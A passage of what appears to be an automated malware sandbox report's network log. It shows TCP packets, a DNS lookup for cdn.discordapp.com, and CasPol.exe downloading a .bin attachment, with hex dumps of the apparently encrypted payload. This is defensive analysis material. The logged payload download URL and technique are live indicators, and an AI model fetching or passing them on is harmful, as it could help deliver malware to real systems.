Jan 24, 2022 14:09:49.763958931 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:49.764117956 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:49.986814976 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:49.986855984 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:49.987384081 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:49.987479925 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:49.990124941 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.033879995 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.308470964 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.308674097 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.308752060 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.308820963 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.308892012 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.308953047 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.308963060 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.308999062 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309025049 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309031010 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309089899 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309101105 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309119940 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309173107 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309226990 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309279919 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309294939 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309309959 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309372902 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309437037 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309442043 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309458971 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309520960 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309535027 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309592009 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309603930 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309655905 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309665918 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309684038 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309724092 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309760094 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.309770107 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.309952021 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310030937 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310044050 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310102940 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310123920 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310153008 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310189009 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310225010 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310250998 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310399055 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310420990 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310431957 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310447931 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310487986 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310498953 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310559034 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310570955 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310628891 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310630083 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310647011 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310704947 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310739040 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310759068 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310771942 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310822964 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310828924 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310857058 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310869932 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310903072 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310923100 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310942888 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.310954094 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.310985088 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.311017990 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.311026096 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.311037064 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.311072111 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.311110973 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.311124086 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.311135054 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.311168909 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.311214924 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.311225891 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.311244965 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.311290026 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.311306000 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.311321020 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.311362982 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.337349892 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.337553978 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.337613106 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.337704897 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.337707996 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.337728977 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.337776899 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.337790966 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.337825060 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.337908030 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.337946892 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338027000 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338109970 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338184118 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338207960 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338280916 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338301897 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338376999 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338464975 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338541985 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338556051 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338587046 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338614941 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338627100 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338641882 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338664055 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338679075 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338691950 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338733912 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338782072 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338850021 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338929892 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.338937044 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.338949919 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.339001894 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.339080095 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.339152098 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.339159012 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.339176893 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.339224100 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.366704941 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.366820097 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.366883993 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.366904020 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.366926908 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.366974115 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.366993904 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367031097 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367060900 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367083073 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367085934 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367157936 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367172956 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367189884 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367259979 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367264032 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367288113 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367373943 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367439985 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367533922 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367549896 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367562056 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367613077 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367660999 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367743969 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367814064 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367834091 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367846966 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.367923975 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.367984056 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368063927 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.368065119 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368082047 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368153095 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.368161917 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368180990 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368244886 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.368334055 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368426085 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.368494034 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368577957 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.368580103 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368597031 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368652105 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.368669033 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368746042 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368752003 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.368765116 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368819952 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.368920088 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.368997097 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369010925 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.369021893 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369069099 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.369112968 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.369168043 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369247913 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369251966 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.369265079 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369330883 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.369411945 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369493961 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.369548082 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369632006 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.369645119 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369714975 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.369719028 CET	443	49750	162.159.133.233	192.168.2.3
Jan 24, 2022 14:09:50.369784117 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.370104074 CET	49750	443	192.168.2.3	162.159.133.233
Jan 24, 2022 14:09:50.370131016 CET	443	49750	162.159.133.233	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2022 14:09:49.442687988 CET	54154	53	192.168.2.3	8.8.8.8
Jan 24, 2022 14:09:49.462178946 CET	53	54154	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 24, 2022 14:09:49.442687988 CET	192.168.2.3	8.8.8.8	0xcede	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 24, 2022 14:09:49.462178946 CET	8.8.8.8	192.168.2.3	0xcede	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Jan 24, 2022 14:09:49.462178946 CET	8.8.8.8	192.168.2.3	0xcede	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Jan 24, 2022 14:09:49.462178946 CET	8.8.8.8	192.168.2.3	0xcede	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Jan 24, 2022 14:09:49.462178946 CET	8.8.8.8	192.168.2.3	0xcede	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Jan 24, 2022 14:09:49.462178946 CET	8.8.8.8	192.168.2.3	0xcede	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49750	162.159.133.233	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-24 13:09:49 UTC	0	OUT	GET /attachments/934180388522299433/935091672193314826/kubaba_yqzTpIrbd157.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com Cache-Control: no-cache
2022-01-24 13:09:50 UTC	0	IN	HTTP/1.1 200 OK Date: Mon, 24 Jan 2022 13:09:50 GMT Content-Type: application/octet-stream Content-Length: 219200 Connection: close CF-Ray: 6d297f9b8f9b8897-LHR Accept-Ranges: bytes Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=kubaba_yqzTpIrbd157.bin ETag: "a75b51e3582de63748cbaeb643997139" Expires: Tue, 24 Jan 2023 13:09:50 GMT Last-Modified: Mon, 24 Jan 2022 08:40:27 GMT Vary: Accept-Encoding CF-Cache-Status: MISS Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1643013627858961 x-goog-hash: crc32c=5zi2WQ== x-goog-hash: md5=p1tR41gt5jdIy662Q5lxOQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 219200 X-GUploader-UploadID: ADPycdu0NNkdE-SANwhza-Xr74inOZNWvVs5Lcxo6cR9RjznDYhLpPhf08h82x6f6hgr6UA9WY9kpDNQfEKBnBMWGDE X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OhB%2BBSpH66Y1TCIGDk3QtWWsNApoHxHeatBV%2F7acBNLnh7rK5yUJUHq6OW5Ruo105YTLLy0DMWdPajNz6%2FyhUOesTEUVmdnCrze92iEqix0u8DIP5OM9e5%2BBSZn0mb4dkzRHkg%3D%3D"}],"group":"cf-nel","max_age":604800}
2022-01-24 13:09:50 UTC	1	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2022-01-24 13:09:50 UTC	1	IN	Data Raw: 01 68 57 e4 b3 1d b3 85 c9 33 9b c9 0c 74 83 ce 4f 2e 30 7a 3b b5 85 2f 68 33 4a 7c 4a 7a 0d 8e 76 e1 68 ac 53 08 ae 4b ec 0f a6 27 4d b9 a9 c5 fd 54 45 f7 75 12 37 7a 8b f7 64 82 32 ec 13 7d a5 66 aa 14 83 b9 9e 1b ad 20 58 5e d1 70 27 9f 1c 45 1c d1 65 57 d0 8a 2a f8 b6 2c 2e ea fa 25 e2 ad 9b 48 eb cf 3b 02 2b db 43 65 e1 8d cb 00 7c dc 0e ab 33 ed a8 6d 35 33 4c 81 18 fd 6e 4a 4b 88 c5 2c b4 cf 0f d5 e7 05 70 ef af 40 c3 aa 25 f9 65 7d 38 7a 24 24 55 4a 4c 16 5a 39 5b d1 8d 84 de db 05 ec df b7 75 06 3c 9c f4 e4 b0 a4 e2 29 f4 a1 a6 98 1e 71 91 f5 07 be 05 18 f0 a9 a5 73 21 41 95 24 23 c2 81 d0 9d 2b 0d ed bc 49 85 35 0e 1d 61 52 eb a1 a1 7c fd 1d a9 9c d4 32 8a 5f 8a d0 4d 71 f7 92 4c 17 65 bb 35 63 16 b5 53 e7 9a 86 aa 7b 02 5c 3a 69 36 fb b5 ed 64 Data Ascii: hW3tO.0z;/h3J\|JzvhSK'MTEu7zd2}f X^p'EeW*,.%H;+Ce\|3m53LnJK,p@%e}8z$$UJLZ9[u<)qs!A$#+I5aR\|2_MqLe5cS{\:i6d
2022-01-24 13:09:50 UTC	2	IN	Data Raw: ee 87 aa 7a 84 ea ff 90 29 7b 35 63 1f 7d c0 ab 37 1f 84 3d 1c fd da 5d 08 9b 27 e5 cc aa 03 68 a1 2d 11 2f 94 49 0d 7e e4 4e ad aa dd 49 68 8e a0 c4 34 38 de d3 98 d9 27 04 dd d4 af 22 71 eb 15 a6 99 c0 20 1d ac d8 d0 78 39 7c 4f c9 59 21 f8 fb d7 17 81 d4 0e ac 2e a8 b5 ea a0 43 b0 1c 34 59 59 a7 fa 41 e1 3b 55 7c 6b dd 59 1e 67 ba 43 c5 fa 80 41 d7 be 03 3a 14 ce 23 3b c2 19 fc 98 7e 7b bc 6f 6a 60 d8 49 58 ab 8a a2 c8 94 8c 91 cf f5 5b 00 60 48 ca 4e 69 0d 51 5e e2 2e 24 49 1c 3f 22 16 ca 62 14 b5 78 e4 d8 37 c2 77 9e cd 3d dd bf c2 f2 73 b1 4e 9e 5b ce 25 34 51 af 4c cc 83 47 38 5b a8 83 1d 07 c8 f0 03 ed ad e6 0c 51 7f 49 ed d1 55 35 9d 21 b2 5e 78 90 3e 42 bf c2 24 a4 9b 4c dd f0 26 e5 35 72 91 9e fa 2d 83 af 0b 73 08 e6 7a 2f 42 a0 9b b1 55 99 d6 Data Ascii: z){5c}7=]'h-/I~NIh48'"q x9\|OY!.C4YYA;U\|kYgCA:#;~{oj`IX[`HNiQ^.$I?"bx7w=sN[%4QLG8[QIU5!^x>B$L&5r-sz/BU
2022-01-24 13:09:50 UTC	4	IN	Data Raw: bd 71 a7 4a 50 97 c2 46 a6 0c 73 45 15 43 52 1c 16 6c 75 31 7b 2e c0 f6 a4 bc ba 0d a7 aa d9 5f b1 5d 99 98 9c e3 84 85 55 94 ec b0 95 13 71 6b f5 79 ad 05 18 f4 d7 fa 36 21 45 ce 0d 1a c2 ef bf 0d 5b 0d ed b8 65 8e 4b 01 1d 81 56 f5 88 91 7d f6 17 77 de ff 05 8a 57 80 f8 75 71 f7 98 fc 7a 18 87 35 43 1c 9d 14 e5 9a 80 bd 14 7f 5c 3a 43 25 fe a4 ea 4c e9 bd 8b ea 51 f6 db df fa ef 8a 10 10 13 cd 4e 75 37 32 6a 32 01 ec d1 40 c5 ae af ef ce 0f 97 01 7f af 20 c3 a5 65 79 35 aa 4b b4 28 1a b9 83 22 51 49 cd 2d 3e 8c 3c c1 53 b8 47 e1 e2 fe 97 31 02 50 eb 7f 32 85 22 90 fd f5 89 93 28 9d a2 9c ff 35 00 cb b7 54 24 4e a5 17 3f bc e7 1c 7f 57 e7 de 02 2e ff bc 4a 07 12 61 3b ef ad 08 69 38 97 8d 11 2d c5 e8 ef 04 d7 80 fe d7 b2 c1 6a 67 1a 50 4f 77 0a 01 a8 d1 Data Ascii: qJPFsECRlu1{._]Uqky6!E[eKV}wWuqz5C\:C%LQNu72j2@ ey5K("QI-><SG1P2"(5T$N?W.Ja;i8-jgPOw
2022-01-24 13:09:50 UTC	5	IN	Data Raw: 74 ad 89 e5 ae 96 8c 9d 93 3d 57 28 53 60 e4 46 41 33 d1 49 e8 f0 20 4b 2e 7c 46 10 4a 78 14 b5 7c 5d eb 35 c2 22 1e d4 3d 39 bb d4 72 65 b1 4e 9a 4d 4e 3e 34 53 ab 64 e2 f9 47 3e db ce 83 1d 03 2c 70 1e ed a7 e2 7f da 7f 49 eb f9 42 35 9d 27 94 ca 78 90 91 6a a8 c2 da a2 8d cc f4 f0 26 e1 23 f2 b5 9e fa 29 94 22 1e 73 08 e7 7a 28 54 88 bf b2 55 9f 78 44 40 64 fb 16 eb 71 0b 0f 1e ec 3b 04 af b9 f3 51 8b fc 77 2a f0 e8 a2 c4 9d e2 5f 6b 4a c2 4a c2 a9 ce 9e 92 fd c2 f8 db 17 7b 69 76 0c 8c 14 f7 e2 f6 e1 bf 7f 7b 58 0b 99 4a 04 2d 80 b4 48 8b e5 12 39 f9 78 51 a1 e1 42 1f 60 d5 af a4 04 70 7d 3d ce 15 f1 94 ff 43 dd 73 56 70 d9 94 a3 b6 dc 70 01 0a 78 e4 4a 22 95 ae 45 c0 17 e3 f9 56 61 86 f9 18 92 23 4c 81 de 2e 27 93 62 6b a0 31 73 e0 5a fa 34 08 c7 48 Data Ascii: t=W(S`FA3I K.\|FJx\|]5"=9reNMN>4SdG>,pIB5'xj&#)"sz(TUxD@dq;Qw*_kJJ{iv{XJ-H9xQB`p}=CsVppxJ"EVa#L.'bk1sZ4H
2022-01-24 13:09:50 UTC	6	IN	Data Raw: 42 7b 09 c4 d3 57 aa 95 c0 91 c4 1c 9b 7f 06 83 41 d6 ba f9 40 24 82 cb a7 27 01 c5 16 3a cd 52 d1 3c 3f 63 a9 ce 4b a4 c8 f4 93 62 81 ad 19 53 d9 ef ae 94 27 a3 c9 69 98 9a 27 8e 36 92 c2 42 65 d0 a6 5b 30 55 28 02 5f 2b ee 0a e9 50 e1 63 19 3e 4b 24 45 18 13 7d a1 ec b0 0d 78 01 1b a5 59 25 d4 fc ec 10 ae a8 d6 5d b8 d0 66 19 36 41 48 12 5f 0d 80 ec 72 14 06 7c f3 89 df 61 67 a9 8f ff 51 7e 93 ce b8 9c a0 a2 07 5a cb 56 5a 10 06 f3 bc 9c 4f 52 c0 fc e2 a6 f3 10 16 22 b1 98 de 7a 7f 46 94 5e 20 22 58 20 dc 82 1b 08 6b 9e a4 94 09 7a 42 99 a6 b1 b4 8a 19 ee 11 ac d8 46 10 1a 29 8e 43 8b 96 87 4c fc 5a 61 5f 55 a6 1f ee df 3e df 9d af 55 03 3b 30 36 41 02 20 35 ab 32 fd 84 66 b8 83 c5 ca 85 ea f5 87 a4 6e 24 1c 18 6e d5 be dc 1c a4 62 1e ff cb 7f 1e 8e 30 Data Ascii: B{WA@$':R<?cKbS'i'6Be[0U(_+Pc>K$E}xY%]f6AH_r\|agQ~ZVZOR"zF^ "X kzBF)CLZa_U>U;06A 52fn$nb0
